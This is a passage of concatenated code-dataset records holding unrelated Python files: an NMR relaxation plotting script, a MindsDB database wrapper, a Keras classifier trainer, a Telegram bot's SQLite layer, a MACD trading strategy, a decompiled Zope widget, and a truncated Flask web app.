Q3 cross-sections\nfig, ax = plt.subplots(1, 2, figsize=(7, 2.75), subplot_kw={\"projection\": \"csdm\"})\ncb = ax[0].contourf(f_sol, levels=levels, cmap=\"jet_r\")\nax[0].arrow(1, Q4_coordinate * 1e6, -0.5, 0, color=\"blue\")\nax[0].arrow(1, Q3_coordinate * 1e6, -0.5, 0, color=\"orange\")\nax[0].set_ylim(-70, -130)\nax[0].set_xlim(-3, 2.5)\nax[0].set_xlabel(r\"$\\log(\\lambda^{-1}\\,/\\,$s)\")\nax[0].set_ylabel(\"Frequency / ppm\")\nax[0].grid(linestyle=\"--\", alpha=0.75)\n\nax[1].plot(Q4_region, label=\"Q4\")\nax[1].plot(Q3_region, label=\"Q3\")\nax[1].set_xlim(-3, 2.5)\nax[1].set_xlabel(r\"$\\log(\\lambda^{-1}\\,/\\,$s)\")\nax[1].grid(linestyle=\"--\", alpha=0.75)\n\nplt.colorbar(cb, ax=ax[0], ticks=np.arange(11) / 10)\nplt.tight_layout()\nplt.legend()\nplt.savefig(\"10Cs-90Si.pdf\")\nplt.show()\n\n# %%\n# Mean and mode analysis\n# ''''''''''''''''''''''\n# The T2 distribution is sampled over a log-linear scale. The statistical mean of\n# the `Q4_region` and `Q3_region` in log10(T2). 
The mean T2 is 10**(log10(T2)),\n# in units of seconds.\n\nQ4_mean = 10 ** stats.mean(Q4_region)[0] * 1e3 # ms\nQ3_mean = 10 ** stats.mean(Q3_region)[0] * 1e3 # ms\n\n# %%\n# Mode the argument corresponding to the max distribution.\n\n# index corresponding to the max distribution.\narg_index_Q4 = int(np.argmax(Q4_region))\narg_index_Q3 = int(np.argmax(Q3_region))\n\n# log10(T2) coordinates corresponding to the max distribution.\narg_coord_Q4 = Q4_region.dimensions[0].coordinates[arg_index_Q4]\narg_coord_Q3 = Q3_region.dimensions[0].coordinates[arg_index_Q3]\n\n# T2 coordinates corresponding to the max distribution.\nQ4_mode = 10**arg_coord_Q4 * 1e3 # ms\nQ3_mode = 10**arg_coord_Q3 * 1e3 # ms\n\n# %%\n# Results\n# '''''''\nprint(f\"Q4 statistics:\\n\\tmean = {Q4_mean} ms,\\n\\tmode = {Q4_mode} ms\\n\")\nprint(f\"Q3 statistics:\\n\\tmean = {Q3_mean} ms,\\n\\tmode = {Q3_mode} ms\\n\")\nprint(f\"r_λ (mean) = {Q4_mean/Q3_mean}\")\nprint(f\"r_λ (mode) = {Q4_mode/Q3_mode}\")\n","sub_path":"examples/relaxation/plot-10Cs-90Si.py","file_name":"plot-10Cs-90Si.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"18075398","text":"from mindsdb.integrations.clickhouse.clickhouse import Clickhouse\nfrom mindsdb.integrations.postgres.postgres import PostgreSQL\nfrom mindsdb.integrations.mariadb.mariadb import Mariadb\nfrom mindsdb.integrations.mysql.mysql import MySQL\nfrom mindsdb.integrations.mssql.mssql import MSSQL\nfrom mindsdb.integrations.mongodb.mongodb import MongoDB\nfrom mindsdb.integrations.redis.redisdb import Redis\nfrom mindsdb.integrations.kafka.kafkadb import Kafka\nfrom mindsdb.utilities.log import log as logger\nfrom mindsdb.utilities.config import Config\nfrom mindsdb.interfaces.database.integrations import DatasourceController\nfrom mindsdb.utilities.with_kwargs_wrapper import WithKWArgsWrapper\n\n\nclass DatabaseWrapper():\n known_dbs = {'clickhouse': Clickhouse,\n 'mariadb': Mariadb,\n 'mysql': MySQL,\n 'postgres': PostgreSQL,\n 'mssql': MSSQL,\n 'mongodb': MongoDB,\n 'redis': Redis,\n 'kafka': Kafka}\n\n def __init__(self, company_id):\n self.config = Config()\n self.company_id = company_id\n self.datasource_interface = WithKWArgsWrapper(\n DatasourceController(), company_id=company_id\n )\n\n def setup_integration(self, db_alias):\n try:\n # If this is the name of an integration\n integration = self._get_integration(db_alias)\n if integration is False:\n raise Exception(f'Unkonw database integration type for: {db_alias}')\n if integration is not True:\n integration.setup()\n except Exception as e:\n logger.warning('Failed to integrate with database ' + db_alias + f', error: {e}')\n\n def _get_integration(self, db_alias):\n integration = self.datasource_interface.get_db_integration(db_alias)\n if integration:\n db_type = integration['type']\n if db_type in self.known_dbs:\n return self.known_dbs[db_type](self.config, db_alias, integration)\n logger.warning(f'Uknown integration type: {db_type} for database called: {db_alias}')\n return False\n return True\n\n def _get_integrations(self, publish=False):\n all_integrations = self.datasource_interface.get_db_integrations()\n if publish is True:\n all_integrations = [\n x for x, y in self.datasource_interface.get_db_integrations().items()\n if y.get('publish') is True\n ]\n else:\n all_integrations = [x for x in self.datasource_interface.get_db_integrations()]\n integrations = [self._get_integration(x) for x in all_integrations]\n 
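A minimal numpy sketch of the mean/mode logic used in the record above: the distribution is sampled on a log10(T2) grid, so the mean is taken in log space and mapped back with 10**(...), while the mode is simply the grid point at the maximum. The grid and amplitudes below are made up for illustration.

import numpy as np

# hypothetical log10(T2 / s) grid and distribution amplitudes
log_t2 = np.linspace(-3, 4, 32)
amplitude = np.exp(-0.5 * (log_t2 - 1.0) ** 2)

# mean in log10 space, mapped back to seconds: mean T2 = 10**(<log10 T2>)
mean_t2 = 10 ** np.average(log_t2, weights=amplitude)
# mode is the coordinate of the distribution maximum
mode_t2 = 10 ** log_t2[int(np.argmax(amplitude))]
print(mean_t2, mode_t2)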
{"seq_id":"18075398","text":"from mindsdb.integrations.clickhouse.clickhouse import Clickhouse\nfrom mindsdb.integrations.postgres.postgres import PostgreSQL\nfrom mindsdb.integrations.mariadb.mariadb import Mariadb\nfrom mindsdb.integrations.mysql.mysql import MySQL\nfrom mindsdb.integrations.mssql.mssql import MSSQL\nfrom mindsdb.integrations.mongodb.mongodb import MongoDB\nfrom mindsdb.integrations.redis.redisdb import Redis\nfrom mindsdb.integrations.kafka.kafkadb import Kafka\nfrom mindsdb.utilities.log import log as logger\nfrom mindsdb.utilities.config import Config\nfrom mindsdb.interfaces.database.integrations import DatasourceController\nfrom mindsdb.utilities.with_kwargs_wrapper import WithKWArgsWrapper\n\n\nclass DatabaseWrapper():\n    known_dbs = {'clickhouse': Clickhouse,\n                 'mariadb': Mariadb,\n                 'mysql': MySQL,\n                 'postgres': PostgreSQL,\n                 'mssql': MSSQL,\n                 'mongodb': MongoDB,\n                 'redis': Redis,\n                 'kafka': Kafka}\n\n    def __init__(self, company_id):\n        self.config = Config()\n        self.company_id = company_id\n        self.datasource_interface = WithKWArgsWrapper(\n            DatasourceController(), company_id=company_id\n        )\n\n    def setup_integration(self, db_alias):\n        try:\n            # If this is the name of an integration\n            integration = self._get_integration(db_alias)\n            if integration is False:\n                raise Exception(f'Unknown database integration type for: {db_alias}')\n            if integration is not True:\n                integration.setup()\n        except Exception as e:\n            logger.warning('Failed to integrate with database ' + db_alias + f', error: {e}')\n\n    def _get_integration(self, db_alias):\n        integration = self.datasource_interface.get_db_integration(db_alias)\n        if integration:\n            db_type = integration['type']\n            if db_type in self.known_dbs:\n                return self.known_dbs[db_type](self.config, db_alias, integration)\n            logger.warning(f'Unknown integration type: {db_type} for database called: {db_alias}')\n            return False\n        return True\n\n    def _get_integrations(self, publish=False):\n        all_integrations = self.datasource_interface.get_db_integrations()\n        if publish is True:\n            all_integrations = [\n                x for x, y in self.datasource_interface.get_db_integrations().items()\n                if y.get('publish') is True\n            ]\n        else:\n            all_integrations = [x for x in self.datasource_interface.get_db_integrations()]\n        integrations = [self._get_integration(x) for x in all_integrations]\n        integrations = [x for x in integrations if x is not True and x is not False]\n        return integrations\n\n    def register_predictors(self, model_data_arr, integration_name=None):\n        if integration_name is None:\n            integrations = self._get_integrations(publish=True)\n        else:\n            integration = self._get_integration(integration_name)\n            integrations = [] if isinstance(integration, bool) else [integration]\n\n        for integration in integrations:\n            if integration.check_connection():\n                try:\n                    integration.register_predictors(model_data_arr)\n                except Exception as e:\n                    logger.warning(f\"Error {e} when trying to register predictor to {integration.name}. Predictor wouldn't be registered.\")\n            else:\n                logger.warning(f\"There is no connection to {integration.name}. Predictor wouldn't be registered.\")\n\n    def unregister_predictor(self, name):\n        for integration in self._get_integrations(publish=True):\n            # FIXME\n            # !!! Integrations from config.json add to db on each start!!!!\n            if '@@@@@' in name:\n                sn = name.split('@@@@@')\n                assert len(sn) < 3  # security\n                name = sn[1]\n            if integration.check_connection():\n                integration.unregister_predictor(name)\n            else:\n                logger.warning(f\"There is no connection to {integration.name}. Predictor wouldn't be unregistered.\")\n\n    def check_connections(self):\n        connections = {}\n        for integration in self._get_integrations():\n            connections[integration.name] = integration.check_connection()\n\n        return connections\n","sub_path":"mindsdb/interfaces/database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
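The DatabaseWrapper record above dispatches on a type-to-class registry (known_dbs). A standalone sketch of that pattern, with hypothetical handler classes standing in for the real integrations:

class RedisHandler:
    def __init__(self, alias):
        self.alias = alias

class KafkaHandler:
    def __init__(self, alias):
        self.alias = alias

# registry maps a type string to the class that handles it
KNOWN_DBS = {'redis': RedisHandler, 'kafka': KafkaHandler}

def get_handler(db_type, alias):
    # return an instance for known types, None otherwise
    cls = KNOWN_DBS.get(db_type)
    return cls(alias) if cls else None

print(get_handler('redis', 'cache'))   # a RedisHandler instance
print(get_handler('sqlite', 'local'))  # None: unknown type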
{"seq_id":"636229557","text":"#!/usr/bin/env python3\n\"\"\"\nTrain de-novo classifier for berlin som data.\n\"\"\"\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.preprocessing import LabelBinarizer\nfrom tensorflow import keras\nfrom tensorflow.keras import layers, regularizers, models  # pylint: disable=import-error\n# from keras import layers, regularizers, models\nfrom argmagic import argmagic\n\nfrom flowcat import utils, io_functions, mappings\nfrom flowcat.som_dataset import SOMDataset, SOMSequence\n\n\ndef create_model_early_merge(input_shapes, yshape, global_decay=5e-6):\n    inputs = []\n    for xshape in input_shapes:\n        ix = layers.Input(shape=xshape)\n        inputs.append(ix)\n\n    x = layers.concatenate(inputs)\n    x = layers.Conv2D(\n        filters=64, kernel_size=4, activation=\"relu\", strides=3,\n        kernel_regularizer=regularizers.l2(global_decay))(x)\n    x = layers.Conv2D(\n        filters=96, kernel_size=3, activation=\"relu\", strides=2,\n        kernel_regularizer=regularizers.l2(global_decay))(x)\n    x = layers.Conv2D(\n        filters=128, kernel_size=1, activation=\"relu\", strides=1,\n        kernel_regularizer=regularizers.l2(global_decay))(x)\n    x = layers.GlobalAveragePooling2D()(x)\n    # x = layers.MaxPooling2D(pool_size=2, strides=2)(x)\n    # x = layers.Dropout(0.2)(x)\n\n    # x = layers.Dense(\n    #     units=128, activation=\"relu\", kernel_initializer=\"uniform\",\n    #     kernel_regularizer=regularizers.l2(global_decay)\n    # )(x)\n    # x = layers.BatchNormalization()(x)\n    # x = layers.Dropout(0.2)(x)\n    x = layers.Dense(\n        units=128, activation=\"relu\",\n        # kernel_initializer=\"uniform\",\n        kernel_regularizer=regularizers.l2(global_decay)\n    )(x)\n    # x = layers.BatchNormalization()(x)\n    x = layers.Dense(\n        units=64, activation=\"relu\",\n        # kernel_initializer=\"uniform\",\n        kernel_regularizer=regularizers.l2(global_decay)\n    )(x)\n    # x = layers.BatchNormalization()(x)\n    # x = layers.BatchNormalization()(x)\n    # x = layers.Dropout(0.2)(x)\n\n    x = layers.Dense(\n        units=yshape, activation=\"softmax\"\n    )(x)\n\n    model = models.Model(inputs=inputs, outputs=x)\n    for layer in model.layers:\n        print(layer.output_shape)\n    return model\n\n\ndef create_model_multi_input(input_shapes, yshape, global_decay=5e-6):\n    segments = []\n    inputs = []\n    print(input_shapes)\n    for xshape in input_shapes:\n        ix = layers.Input(shape=xshape)\n        inputs.append(ix)\n        x = layers.Conv2D(\n            filters=32, kernel_size=4, activation=\"relu\", strides=1,\n            kernel_regularizer=regularizers.l2(global_decay),\n        )(ix)\n        x = layers.Conv2D(\n            filters=48, kernel_size=3, activation=\"relu\", strides=1,\n            kernel_regularizer=regularizers.l2(global_decay),\n        )(x)\n        # x = layers.Conv2D(\n        #     filters=32, kernel_size=2, activation=\"relu\", strides=1,\n        #     kernel_regularizer=regularizers.l2(global_decay),\n        # )(x)\n        # x = layers.Conv2D(\n        #     filters=64, kernel_size=2, activation=\"relu\", strides=1,\n        #     # kernel_regularizer=regularizers.l2(global_decay),\n        # )(x)\n        # x = layers.MaxPooling2D(pool_size=2, strides=2)(x)\n        x = layers.Conv2D(\n            filters=48, kernel_size=2, activation=\"relu\", strides=1,\n            kernel_regularizer=regularizers.l2(global_decay),\n        )(x)\n        x = layers.Conv2D(\n            filters=64, kernel_size=2, activation=\"relu\", strides=1,\n            kernel_regularizer=regularizers.l2(global_decay),\n        )(x)\n        # x = layers.MaxPooling2D(pool_size=2, strides=2)(x)\n\n        # x = layers.GlobalAveragePooling2D()(x)\n        x = layers.GlobalMaxPooling2D()(x)\n        segments.append(x)\n\n    x = layers.concatenate(segments)\n    # x = layers.Conv2D(\n    #     filters=32, kernel_size=2, activation=\"relu\", strides=1,\n    #     kernel_regularizer=regularizers.l2(global_decay))(x)\n    # x = layers.MaxPooling2D(pool_size=2, strides=2)(x)\n    # x = layers.Dropout(0.2)(x)\n\n    # x = layers.Flatten()(ix)\n\n    # x = layers.Dense(\n    #     units=128, activation=\"relu\", kernel_initializer=\"uniform\",\n    #     kernel_regularizer=regularizers.l2(global_decay)\n    # )(x)\n    # x = layers.BatchNormalization()(x)\n    # x = layers.Dropout(0.2)(x)\n    x = layers.Dense(\n        units=128, activation=\"relu\",\n        # kernel_initializer=\"uniform\",\n        kernel_regularizer=regularizers.l2(global_decay)\n    )(x)\n    # x = layers.BatchNormalization()(x)\n    x = layers.Dense(\n        units=64, activation=\"relu\",\n        # kernel_initializer=\"uniform\",\n        kernel_regularizer=regularizers.l2(global_decay)\n    )(x)\n    # x = layers.BatchNormalization()(x)\n    # x = layers.BatchNormalization()(x)\n    # x = layers.Dropout(0.2)(x)\n\n    x = layers.Dense(\n        units=yshape, activation=\"softmax\"\n    )(x)\n\n    model = models.Model(inputs=inputs, outputs=x)\n    for layer in model.layers:\n        print(layer.output_shape)\n    return model\n\n\ndef get_model(channel_config, groups, **kwargs):\n    inputs = tuple([*d[\"dims\"][:-1], len(d[\"channels\"])] for d in channel_config.values())\n    output = len(groups)\n\n    # model = create_model_multi_input(inputs, output, **kwargs)\n    model = create_model_multi_input(inputs, output, **kwargs)\n    model.compile(\n        loss=\"categorical_crossentropy\",\n        # loss=\"binary_crossentropy\",\n        optimizer=\"adam\",\n        # optimizer=optimizers.Adam(lr=0.0, decay=0.0, epsilon=epsilon),\n        metrics=[\n            \"acc\",\n        ]\n    )\n\n    binarizer = LabelBinarizer()\n    binarizer.fit(groups)\n    return binarizer, model\n\n\ndef main(data: utils.URLPath, meta: utils.URLPath, output: utils.URLPath):\n    \"\"\"\n    Args:\n        data: Path to som dataset\n        output: Output path\n    \"\"\"\n    tubes = (\"2\", \"3\", \"4\")\n    pad_width = 1\n\n    group_mapping = mappings.GROUP_MAPS[\"8class\"]\n    mapping = group_mapping[\"map\"]\n    groups = group_mapping[\"groups\"]\n\n    # dataset = io_functions.load_case_collection(data, meta)\n    dataset = SOMDataset.from_path(data)\n    if mapping:\n        dataset = dataset.map_groups(mapping)\n\n    dataset = dataset.filter(groups=[g for g in groups if g not in (\"LPL\", \"MZL\")])\n\n    dataset_groups = {d.group for d in dataset}\n\n    # if set(groups) != dataset_groups:\n    #     raise RuntimeError(f\"Group mismatch: {groups}, but got {dataset_groups}\")\n\n    validate, train = dataset.create_split(10, stratify=True)\n\n    group_count = train.group_count\n    num_cases = sum(group_count.values())\n    balanced_nums = num_cases / len(dataset_groups)\n    balanced_loss_weights = [balanced_nums / group_count.get(g, balanced_nums) for g in groups]\n    min_ratio = min(balanced_loss_weights)\n    balanced_loss_weights = {i: v / min_ratio for i, v in enumerate(balanced_loss_weights)}\n    print(balanced_loss_weights)\n\n    # train = train.balance(2000)\n    # train = train.balance_per_group({\n    #     \"CM\": 6000,\n    #     # \"CLL\": 4000,\n    #     # \"MBL\": 2000,\n    #     \"MCL\": 1000,\n    #     \"PL\": 1000,\n    #     \"LPL\": 1000,\n    #     \"MZL\": 1000,\n    #     \"FL\": 1000,\n    #     \"HCL\": 1000,\n    #     \"normal\": 6000,\n    # })\n\n    io_functions.save_json(train.labels, output / \"ids_train.json\")\n    io_functions.save_json(validate.labels, output / \"ids_validate.json\")\n\n    som_config = io_functions.load_json(data + \"_config.json\")\n    selected_tubes = {tube: som_config[tube] for tube in tubes}\n\n    config = {\n        \"tubes\": selected_tubes,\n        \"groups\": groups,\n        \"pad_width\": pad_width,\n        \"mapping\": group_mapping,\n    }\n    io_functions.save_json(config, output / \"config.json\")\n\n    for tube in tubes:\n        x, y, z = selected_tubes[tube][\"dims\"]\n        selected_tubes[tube][\"dims\"] = (x + 2 * pad_width, y + 2 * pad_width, z)\n\n    binarizer, model = get_model(selected_tubes, groups=groups, global_decay=5e-7)\n\n    def getter_fun(sample, tube):\n        return sample.get_tube(tube)\n\n    trainseq = SOMSequence(\n        train, binarizer,\n        tube=tubes,\n        get_array_fun=getter_fun,\n        batch_size=32,\n        pad_width=pad_width)\n    validseq = SOMSequence(\n        validate, binarizer,\n        tube=tubes,\n        get_array_fun=getter_fun,\n        batch_size=128,\n        pad_width=pad_width)\n\n    tensorboard_dir = str(output / \"tensorboard\")\n    tensorboard_callback = keras.callbacks.TensorBoard(\n        log_dir=str(tensorboard_dir),\n        histogram_freq=5,\n        write_grads=True,\n        write_images=True,\n    )\n    nan_callback = keras.callbacks.TerminateOnNaN()\n\n    model.fit_generator(\n        epochs=15, shuffle=True,\n        callbacks=[tensorboard_callback, nan_callback],\n        class_weight=balanced_loss_weights,\n        generator=trainseq, validation_data=validseq)\n\n    model.save(str(output / \"model.h5\"))\n    io_functions.save_joblib(binarizer, output / \"binarizer.joblib\")\n\n    preds = []\n    for pred in model.predict_generator(validseq):\n        preds.append(pred)\n    pred_arr = np.array(preds)\n    pred_labels = binarizer.inverse_transform(pred_arr)\n    true_labels = validseq.true_labels\n\n    confusion = metrics.confusion_matrix(true_labels, pred_labels, labels=groups)\n    print(groups)\n    print(confusion)\n    balanced = metrics.balanced_accuracy_score(true_labels, pred_labels)\n    print(balanced)\n\n    # preds = []\n    # for pred in model.predict_generator(validseq):\n    #     preds.append(pred)\n\n    # args.output.local.mkdir(parents=True, exist_ok=True)\n\n\nif __name__ == \"__main__\":\n    argmagic(main)\n","sub_path":"scripts/53_denovo.py","file_name":"53_denovo.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
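A small worked sketch of the balanced class-weight computation that main() performs in the record above: each class weight is the balanced per-class count divided by the observed count, normalized by the minimum. The counts below are made up.

group_count = {'CLL': 600, 'MCL': 100, 'normal': 300}
groups = list(group_count)
num_cases = sum(group_count.values())   # 1000
balanced_nums = num_cases / len(groups)  # ~333.3 cases per class if balanced
weights = [balanced_nums / group_count[g] for g in groups]
min_ratio = min(weights)
class_weight = {i: w / min_ratio for i, w in enumerate(weights)}
print(class_weight)  # rarer classes receive proportionally larger weights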
{"seq_id":"134006239","text":"import sqlite3\nimport os\nfrom telethon.tl import types\nfrom . import states\n\n\nclass Database:\n    def __init__(self, dbpath):\n        conn = sqlite3.connect(dbpath)\n        cursor = conn.cursor()\n        cursor.execute(\"\"\"\n            CREATE TABLE IF NOT EXISTS channels (\n                channel_id INTEGER PRIMARY KEY NOT NULL,\n                username TEXT,\n                title TEXT NOT NULL\n            );\n        \"\"\")\n        cursor.execute(\"\"\"\n            CREATE TABLE IF NOT EXISTS messages (\n                rowid INTEGER PRIMARY KEY AUTOINCREMENT,\n                message_id INTEGER NOT NULL,\n                channel_id INTEGER NOT NULL,\n                content TEXT NOT NULL\n            );\n        \"\"\")\n        cursor.execute(\"\"\"\n            CREATE TABLE IF NOT EXISTS users (\n                user_id INTEGER PRIMARY KEY,\n                username TEXT,\n                state INTEGER NOT NULL,\n                selected_id INTEGER,\n                lang TEXT DEFAULT follow NOT NULL\n            );\n        \"\"\")\n        # A junction table to handle many-to-many relationship between channels and admins\n        cursor.execute(\"\"\"\n            CREATE TABLE IF NOT EXISTS channels_admins (\n                channel_id INTEGER NOT NULL,\n                user_id INTEGER NOT NULL\n            );\n        \"\"\")\n        try:\n            cursor.execute('SELECT lang FROM users')\n        except sqlite3.OperationalError:\n            cursor.execute('ALTER TABLE users ADD lang TEXT DEFAULT follow NOT NULL')\n        self.conn = conn\n        self.cursor = cursor\n\n    def save_user(self, user: types.User):\n        self.cursor.execute(\n            'INSERT OR IGNORE INTO users (user_id, username, state) VALUES (?, ?, ?)',\n            (user.id, user.username, states.Empty))\n        self.clear_user_state(user)\n\n    def get_user_state(self, user: types.User):\n        self.cursor.execute('SELECT state FROM users WHERE user_id = ?',\n                            (user.id, ))\n        fetched = self.cursor.fetchone()\n        return None if fetched is None else states.State(fetched[0])\n\n    def set_user_state(self, user: types.User, state: states.State):\n        self.cursor.execute('UPDATE users SET state = ? WHERE user_id = ?',\n                            (state.numerator, user.id))\n        self.conn.commit()\n\n    def clear_user_state(self, user: types.User):\n        self.set_user_state(user, state=states.Empty)\n\n    def check_channel_saved(self, channel: types.Channel):\n        self.cursor.execute('SELECT * FROM channels WHERE channel_id = ?',\n                            (channel.id, ))\n        return self.cursor.fetchone() is not None\n\n    def save_channel(self, channel: types.Channel):\n        self.cursor.execute(\n            'INSERT INTO channels (channel_id, username, title) VALUES (?, ?, ?)',\n            (channel.id, channel.username, channel.title))\n\n    def save_channel_admin_relation(self, channel_id: int, admin: types.User):\n        if admin.bot:\n            return\n        self.cursor.execute(\n            'INSERT INTO channels_admins (channel_id, user_id) VALUES (?, ?)',\n            (channel_id, admin.id))\n\n    def get_user_owned_channels(self, user: types.User):\n        self.cursor.execute(\n            'SELECT channel_id FROM channels_admins WHERE user_id = ?',\n            (user.id, ))\n        sqlresult = self.cursor.fetchall()\n        return [x[0] for x in sqlresult]\n\n    def get_channel_admins(self, channel_id: types.Channel):\n        self.cursor.execute(\n            'SELECT user_id FROM channels_admins WHERE channel_id = ?',\n            (channel_id, ))\n        sqlresult = self.cursor.fetchall()\n        # Return ids only\n        return map(lambda x: x[0], sqlresult)\n\n    def get_channel_title(self, channel_id: int):\n        self.cursor.execute('SELECT title FROM channels WHERE channel_id = ?',\n                            (channel_id, ))\n        return self.cursor.fetchone()[0]\n\n    def save_message(self, message: types.Message):\n        if not isinstance(message, types.Message):\n            return\n        if (message.message is None) or (len(message.message) == 0):\n            return\n        self.cursor.execute(\n            'INSERT INTO messages (message_id, channel_id, content) VALUES (?, ?, ?)',\n            (message.id, message.to_id.channel_id, message.message))\n\n    def update_message(self, message: types.Message):\n        self.cursor.execute(\n            'SELECT rowid FROM messages WHERE message_id=? AND channel_id=?',\n            (message.id, message.to_id.channel_id))\n        sqlresult = self.cursor.fetchone()\n        if sqlresult is None:\n            self.cursor.execute(\n                'INSERT INTO messages (message_id, channel_id, content) VALUES (?, ?, ?)',\n                (message.id, message.to_id.channel_id, message.message))\n        else:\n            self.cursor.execute('UPDATE messages SET content=? WHERE rowid=?',\n                                (message.message, sqlresult[0]))\n\n    def find_in_messages(self, channel_id: int, pattern: str):\n        self.cursor.execute(\n            'SELECT message_id, content FROM messages WHERE channel_id = ?',\n            (channel_id, ))\n        messages = self.cursor.fetchall()\n        lower_pattern = pattern.lower()\n\n        def filter_matched(m):\n            if m[1] is None:\n                return False\n            return m[1].lower().find(lower_pattern) != -1\n\n        matched_messages = filter(filter_matched, messages)\n        message_ids = [m[0] for m in matched_messages]\n        return message_ids\n\n    def set_user_selected(self, user_id: int, channel_id: int):\n        self.cursor.execute('UPDATE users SET selected_id=? WHERE user_id=?',\n                            (channel_id, user_id))\n        self.conn.commit()\n\n    def get_user_selected(self, user_id: int):\n        self.cursor.execute('SELECT selected_id FROM users WHERE user_id=?',\n                            (user_id, ))\n        return self.cursor.fetchone()[0]\n\n    def set_user_lang(self, user_id: int, langcode: str):\n        self.cursor.execute('UPDATE users SET lang=? WHERE user_id=?',\n                            (langcode, user_id))\n\n    def get_user_lang(self, user_id: int):\n        self.cursor.execute('SELECT lang FROM users WHERE user_id=?',\n                            (user_id, ))\n        return self.cursor.fetchone()[0]\n","sub_path":"tgficbot/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
{"seq_id":"317766797","text":"from .portfolio_base import PortfolioBase\nfrom ...signals import pyti_macd_signal\n\n\n# custom param, default\n# 'short_window', 12\n# 'long_window', 26\n# 'signal_window', 9\nclass Macd(PortfolioBase):\n\n    def __init__(self, default, limits, custom, portfolio, portfolio_id=None, strategy_id=None):\n        super().__init__(default, limits, portfolio, portfolio_id, strategy_id)\n        self.signal = pyti_macd_signal.PytiMacdSignal(\n            self.market,\n            self.interval,\n            custom,\n            self\n        )\n\n    def on_data(self, candle):\n        action = self.signal.check_condition(candle)\n        if self.get_open_position_count() >= self.position_limit and action == 'buy':\n            action = 'hold'\n        self.execute(\n            self.order_quantity,\n            self.fixed_stoploss_percentage,\n            self.trailing_stoploss_percentage,\n            self.profit_target_percentage,\n            action\n        )\n","sub_path":"kryptobot/strategies/t2/macd.py","file_name":"macd.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
{"seq_id":"320400711","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/ztfy/sendit/skin/packet/widget.py\n# Compiled at: 2013-05-31 13:02:11\nfrom ztfy.security.browser.widget.interfaces import IPrincipalListWidget\nfrom ztfy.sendit.app.interfaces import ISenditApplication\nfrom ztfy.sendit.profile.interfaces import IProfile\nfrom z3c.form.widget import FieldWidget\nfrom ztfy.security.browser.widget.principal import PrincipalListWidget\nfrom ztfy.utils.traversing import getParent\n\nclass IPacketRecipientsWidget(IPrincipalListWidget):\n    \"\"\"Packet recipients widget interface\"\"\"\n\n    def canRegisterUser(self):\n        \"\"\"Check if user can register new external users\"\"\"\n        pass\n\n\nclass PacketRecipientsWidget(PrincipalListWidget):\n    \"\"\"Packet recipients widget\"\"\"\n    query_name = 'findFilteredPrincipals'\n    registration_view_name = 'register_user.html'\n\n    def canRegisterUser(self):\n        profile = IProfile(self.request.principal)\n        name, _plugin, _info = profile.getAuthenticatorPlugin()\n        if name is None:\n            return False\n        else:\n            app = getParent(self.context, ISenditApplication)\n            return app is not None and name in app.internal_auth_plugins\n\n\ndef PacketRecipientsWidgetFactory(field, request):\n    return FieldWidget(field, PacketRecipientsWidget(request))","sub_path":"pycfiles/ztfy.sendit-0.1.20-py2.7/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
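The channels_admins table in the tgficbot schema above is a classic junction table for a many-to-many relation between channels and admins. A minimal sqlite3 sketch of querying it, using an in-memory database and made-up rows:

import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE channels_admins (channel_id INTEGER, user_id INTEGER)')
conn.executemany('INSERT INTO channels_admins VALUES (?, ?)',
                 [(1, 10), (1, 11), (2, 10)])
# all channels administered by user 10
rows = conn.execute(
    'SELECT channel_id FROM channels_admins WHERE user_id = ?', (10,)).fetchall()
print([r[0] for r in rows])  # [1, 2]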
{"seq_id":"107984279","text":"# coding=UTF-8\nfrom datetime import datetime\nfrom flask import render_template, flash, redirect, url_for, request\nfrom flask_login import login_user, logout_user, current_user\nfrom app import app, db, lm\n\nfrom app.models.tables import User, Comentario, Texto\nfrom app.models.forms import LoginForm, RegisterComentario, RegisterPost\n\n@lm.user_loader\ndef load_user(id):\n\treturn User.query.filter_by(id=id).first()\n\n@app.route(\"/index\")\n@app.route(\"/\")\ndef index():\n\treturn render_template('index.html')\n\n@app.route(\"/login\", methods=[\"GET\",\"POST\"])\ndef login():\n\tform = LoginForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=form.username.data).first()\n\t\tif user and user.password == form.password.data:\n\t\t\tlogin_user(user)\n\t\t\tflash(\"Logged in\")\n\t\t\treturn redirect(url_for(\"timeline\"))\n\t\telse:\n\t\t\tflash(\"Invalid login\")\n\treturn render_template('login.html',\n\t\t form=form)\n\n@app.route(\"/logout\")\ndef logout():\n\tlogout_user()\n\tflash(\"Logged out\")\n\treturn redirect(url_for(\"index\"))\n\n@app.route(\"/cadastrar\")\ndef cadastrar():\n\treturn render_template(\"cadastro.html\")\n\n@app.route(\"/cadastro\", methods=['GET', 'POST'])\ndef cadastro():\n\tif request.method == \"POST\":\n\t\tusername = request.form.get(\"username\")\n\t\tpassword = request.form.get(\"password\")\n\t\tname = request.form.get(\"name\")\n\t\temail = request.form.get(\"email\")\n\n\t\tif username and password and name and email:\n\t\t\tp = User(username, password, name, email)\n\t\t\tdb.session.add(p)\n\t\t\tdb.session.commit()\n\n\treturn redirect(url_for(\"cadastrado\"))\n\n@app.route(\"/cadastrado\")\ndef cadastrado():\n\treturn render_template(\"cadastrado.html\")\n\n@app.route(\"/publicar\")\ndef publicar():\n\tform = RegisterPost()\n\treturn render_template(\"publicarPost.html\", form=form)\n\n@app.route(\"/publicacoes\", methods=['GET', 'POST'])\ndef publicacoes():\n\tform = RegisterPost()\n\taul = current_user.username\n\tif request.method == \"POST\":\n\t\ttitulo = 